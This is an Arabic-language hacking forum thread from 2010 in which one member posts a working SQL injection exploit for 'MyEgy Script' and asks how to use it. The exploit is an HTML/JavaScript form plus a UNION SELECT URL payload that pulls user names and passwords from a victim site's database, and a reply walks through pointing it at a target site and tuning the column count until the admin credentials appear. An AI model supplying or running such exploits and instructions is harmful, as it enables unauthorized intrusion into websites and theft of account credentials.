التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 11-09-2010, 10:24 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية aassee
 

 

 
إحصائية العضو





aassee غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
aassee is on a distinguished road

................ غير مجاب: ارجو احد يساعدنى فى هذه الثغرة


اسم الثغرة Myegy Script (display.php) Remote SQL Injection Vulnerability وجدتها فى احد المواقع ولكن اريد احد يشرحهالى
واى حد عنده ثغرة لهذا الاسكربت المذكور فى الثغرة ما يبخلش علبا


كود PHP:
<html
<!-- 
Script Name :MyEgy Script 
Authur 
Karar alShaMi Sheko (El3akrab Elmodamer
Email :     K4rar@yahoo.com ahmed_Sheko998@yahoo.com 
Demo 
http://www.7obonlin.com 
Exploit Write the site in (Victimfield then submit the form :) 
AdminCp : /?do=login 
Note 
each color of myegy script have a different columns number so try to change the (Columns numberfield 
to 6 
or or if the exploit failed with 8 :) 
Note 2 We Can Use Get Method To Exploit This Vulnerability 
See line 64 $cat 
$_REQUEST['c']; 
So we Can Exploit it in this way 
http
://localhost/myegy/?c=[Sql] 
[Sql] = -1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8+from+users-- 
//--> 
<head><title>MyEgy Explo!t</title
<
style type="text/css"
.
style1 
 
text-aligncenter

</
style
</
head
<
body
<
script language="Javascript"
function 
doit(si,co){ 
    for(var 
=1;n<co;n++){ 
    if(
tmp){ 
    var 
tmp tmp+n+","
     }else{ 
    var    
tmp n+","
    } 
     } 
tmp =tmp.replace(5,"concat(name,0x3a,password)"); 
********.
f0.action=si+'/'
********.
f0.c.value='-1/**/union/**/select/**/'+tmp+co+'/**/from/**/users--'
********.
f0.submit

</script> 
<form name="f0" method="post"> 
<p class="style1">My Egy Explo!t</p> 
<p class="style1">By : Karar alShaMi &amp; Sheko</p> 
<p class="style1">Victim: <input name="site" type="text" style="width: 253px" value="http://localhost/myegy"></p> 
<p class="style1">Columns Number : <input name="cl" type="text" style="width: 27px; height: 22px" value="8"></p> 
<input name="c" type="hidden" value="-1"> 
 <div class="style1"> 
<input name="Submit1" type="submit" value="submit" style="width: 72px" onclick="doit(********.f0.site.value,********.f0.cl.value);"></div> 
</form> 
</body> 
</html 

ودا رابط تحميل ملف التكست عشان لو فيه اكواد ممنوعه فى المنتدى
http://www.mediafire.com/?564xbutz34c81b1
>


Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC hv[, hp] dshu]kn tn i`i hgeyvm

   

رد مع اقتباس
قديم 11-11-2010, 03:12 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


اهلين اخي الغالي ياريت تبدأ بالسلام عليكم اولا ..

شوف معاي .:

أسم الثغرة .:

Remote SQL Injection

صاحب الثغرة كاتبهـأ بلغـة [ html هتمل ]..:

طيب انت انسخ محتوى الثغرة كاملة وضعهـأ في ملف المفكرة تمام ..:

اقتباس
ودا رابط تحميل ملف التكست عشان لو فيه اكواد ممنوعه فى المنتدى
http://www.mediafire.com/?564xbutz34c81b1




تمام انت وضعتها في ملف تكست حلوو .:

طيب الحين افتح ملف التكست وعدل على الازم في الثغرة .:

ابحث في ملف التكست عن هذا االاسم .:

http://localhost

تمام وبدله برابط الموقع الي مركب السكربت او الموقع المصاب الي مركب السكربت . تمام ..

يعني مثلا .لو الموقع المصاب هذا .:

http://nano.com

انسخ الرابط واحطه بدال كلمـــــــة http://localhost الي بالثغرة . وبعدين احفظ الثغرة اختر [ حفظ بإسم ]..:

ومثلا احفظهـأ بإسم nano.html تمام وبعدين افتحــها بالمتصفح وراح تحصل الموقع الي اضفته انت بدال كلمة http://localhost وتحت راح تصل مكتوب .Columns Number وجنبها رقم 8 يعني عدد الاعمدة المصابة في الموقع وخليها نفس ماهي افضل وبعدين اضغط على كلمة ..[ Submit1 ] وراح تستغل الثغرة ويطلع لك اليوزر نيم والباسورد تبع الادمن ..

ولو ماطلع معاك جرب تحقن الموقع انت بالحقنه هذي مكتوبه بدال ملف التكست صاحب الثغره كاتبها لك .:

http://localhost/myegy/?c=-1+union+s...8+from+users--

بدل كلمة localhost برابط الموقع المصاب .:

ولو تلاحظ مكتوب في اخر العمود المصاب رقم [ 8 ] انت جرب في الموقع المصاب جرب الاستغلال عليه ونقص بعدد الاعمدة حتى يطلع معاك اليوزر والباسورد .. ولازم تتعلم طرق استغلال ثغرات الـ sql عشان تعرف كيف تتعامل مع الحقنه او الموقع المصاب .

--------------------------------

ان شاء الله اني افدتك . اخوكـ .:

Dr.NaNo


بالتوفيق لكـ.

--------------------------------
التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 11-11-2010, 05:06 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية aassee
 

 

 
إحصائية العضو





aassee غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
aassee is on a distinguished road

افتراضي


بارك الله فيك شرح اكثر من رائع
+ احلى تقييم

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ضروري حدا يساعدني mano جـــ'ابات العناكــ'ب 3 12-16-2010 06:25 PM
موقع على طبق من ذهب+هدية لمن يساعدني zedoussama Hackers Showoff 8 11-22-2010 02:32 AM
ممكن شرح استغلال الثغرة ذي .. MOST7EL جـــ'ابات العناكــ'ب 0 07-21-2010 11:33 AM
مشكلة في استغلال الثغرة Black DeveL جـــ'ابات العناكــ'ب 4 08-18-2009 10:16 AM


الساعة الآن 11:10 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0